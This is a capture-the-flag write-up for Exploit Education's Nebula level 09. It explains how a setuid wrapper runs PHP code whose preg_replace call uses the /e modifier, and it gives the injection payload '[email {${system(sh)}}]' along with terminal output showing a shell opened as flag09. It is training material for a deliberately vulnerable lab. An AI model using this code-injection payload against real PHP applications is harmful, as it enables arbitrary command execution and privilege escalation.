Exploit-Education Nebula Level 09
Exploit Education Level 9
Challenge
There is a C setuid wrapper for some vulnerable PHP code.
To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09.
Taking a look at the code,it is possible to identify some calls to the preg_replace, whose function is to replace content in a
string based on a regular expression. The first preg_replace will basically replace all the “.” by “dot” and all the “@” by “AT”.
The last two preg_replace will replace the square brackets by the angle quotes.
If you feed some file to this program, flag09 will analyze and replace all “@” and “.” symbols. At the end, will print to the command line the entire file sanitized.
For example, the following image contains the output of running flag09 with some file containing “[abc@gmail.com]”.
level09@nebula:~$ /home/flag09/flag09 arg
PHP Notice: Undefined offset: 2 in /home/flag09/flag09.php on line 22
abc AT gmail dot com
Vulnerability
The vulnerability is in the following line
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
In order to get a shell, we can place in the file “[email {${system(sh)}}]” instead of the last string.
This because PHP will try to evaluate the expression due to the /e tag
PHP preg_replace Vulnerability
level09@nebula:~$ /home/flag09/flag09 arg2
PHP Notice: Undefined offset: 2 in /home/flag09/flag09.php on line 22
PHP Notice: Use of undefined constant sh - assumed 'sh' in /home/flag09/flag09.php(15) : regexp code on line 1
sh-4.2$ id
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
sh-4.2$ getflag
You have successfully executed getflag on a target account
